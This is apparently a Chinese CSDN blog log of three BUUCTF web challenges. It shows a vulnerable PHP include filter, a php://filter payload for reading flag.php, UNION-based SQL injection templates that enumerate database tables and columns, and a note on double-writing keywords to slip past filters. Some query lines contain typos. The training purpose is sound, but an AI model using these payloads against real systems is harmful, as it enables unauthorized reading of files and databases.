【CTF】-Web练习日志8.12

最新推荐文章于 2022-12-12 20:12:40 发布
最新推荐文章于 2022-12-12 20:12:40 发布
阅读量1k 收藏
点赞数
文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyhsaihz/article/details/126312520
版权

题目一:[极客大挑战 2019]Secret File1

 

 查看源代码发现 Archive_room.phpaction.php 

但是查看action页面会自动跳转到end,利用burp suite 抓包看一下发现secr3t.php 

查看页面

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

 看着像php伪协议套模板看一下

?file=php://filter/read=convert.base64-encode/resource=flag.php

结果解码得到 flag

 题目二:[极客大挑战 2019]LoveSQL1

 

万能密码直接上 

Hello admin!

Your password is '1a14e8198f530d4e0668847bdaf9f8eb'

MD5解码解不出来

sql注入测试

[极客大挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)_WHOAMIAnony的博客-CSDN博客_极客大挑战2019lovesql

简单的sql手工注入过程_nlog3n的博客-CSDN博客_sql手工注入步骤 

关键

爆库>爆表>字段>查询

select * from user where id='' union select user(),database(),version()+--+;

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

题目三:[极客大挑战 2019]BabySQL1

整体思路和题目二是一样的

这里的考点就是union select form 的绕过

百度了绕过的各种方法

尝试了编码绕过 %00 大小写都不行,只有双写可以

BUUCTF-[极客大挑战 2019]BabySQL 1 详解 - junlebao - 博客园

 

pyhsaihz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF实战训练日志——2021-10-14(七)
stybill的博客
10-14 5万+
题目:利用Burp进行密码绕过 在Username中,无法输入内容,Password可以输入。 解题思路 利用Burp抓包,然后修改响应包的内容 Action -> Do intercept -> Response to this request -> Forward 分析响应包,我们会发现中的【R0pDVEY=】,这个值很明显是经过base64加密过的,解密之后,发现结果为GJCTF,这个值和Username中的一样,说明Username需要经过base64加密变成校.
文件包含漏洞(绕过姿势)
heiseweiye的博客
09-19 7107
1.1文件包含漏洞的形成 文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshell。 文件包含函数主要有以下四个: include() include_once require() require_once() 他们之间的区别在于...
ctf show-web入门 php特性篇部分题解
volcano的博客
02-24 3289
ctfshowphp特性preg_match()intval()web96(路径问题)web98web99(in_array弱类型比较)in_array()web100var_dump()函数web101web102-103hex2bin()函数substr() 函数call_user_func()函数web104、106web105(双$$变量覆盖)web107(parse_str变量覆盖)parse_str()Parse_str()函数引起的变量覆盖漏洞web108(%00截断)ereg()函数strr
[SCUCTF2022]校赛Web出题笔记
cosmoslin的博客
05-27 1967
前言 本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。 checkin <?php error_reporting(0); $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='inject'){ die('Permission denied'); } $lock = call_user_func(($_GET['Y'])); if (
文件下载,包含
qq_41672971的博客
12-12 127
11111111111
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
buuctf-web-[极客大挑战 2019]Secret File1
mlws1900的博客
08-05 494
get传参,可以利用文件包含,对tp,input进行了过滤,可以用filter对文件进行读取,而且已经告知我们flag在flag.php里面,写出如下payload。刚开始看到这个界面还以为是目录扫描,结果把网页扫死了。发现一个 secr3t.php,打开获得了代码。对以上编码进行base64解码获得flag。点击secret,看来要利用bp抓包。...
[极客大挑战 2019]Secret File
rang的博客
10-18 118
根据提示,猜测这个页面可能隐藏了信息 查看源代码: 发现了/Archive_room.php 点一下密码啥都没有 用burp抓包 抓到action.php 得到secr3t.php if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } 过滤了 ../ input .
base解码_php://filter在一次CTF中base被过滤的利用
weixin_39565910的博客
11-27 864
0x00 简介在一次线下ctf中的web题有一道关于php://filter伪协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
Secret File
weixin_46580614的博客
07-16 155
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
CTF题】使用文件包含漏洞读取网页代码
热门推荐
keysking瞎写东西的地方
01-25 2万+
CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file']; ?>那么就可以通过抓包修改file值的办法去运行一些本来不该运行
buuctf刷题之旅之web(一)
qq_50589021的博客
08-17 4841
2021-01-15 第一题:[HCTF 2018]WarmUp 这里懒得上传图片了,所以就直接笔记了 源代码里面有1.source.php,所以打开以后还会发先2.hint.php 1打开后会发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["s
bugku平台web部分writeup
test
10-16 4782
前言 很久以前基本就做完了bugku平台上的web题目,最近整理整理一下。 正文 web2 提示:听说聪明的人都能找到答案 链接 flag在源代码中。 计算器 后言 ...
风云杯大学生信安大赛(Web部分题解)
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7题,第8,9题见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本题考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
[极客大挑战 2019]LoveSQL
d0ud的博客
10-16 77
显然是一道SQL注入题 在用户名和密码处输入引号测试,可以发现是单引号闭合。 输入以下进行测试 q';test 123 回显 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘test’ and password=‘123’’ at line 1 此时很容易想到输入 a 1' or
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值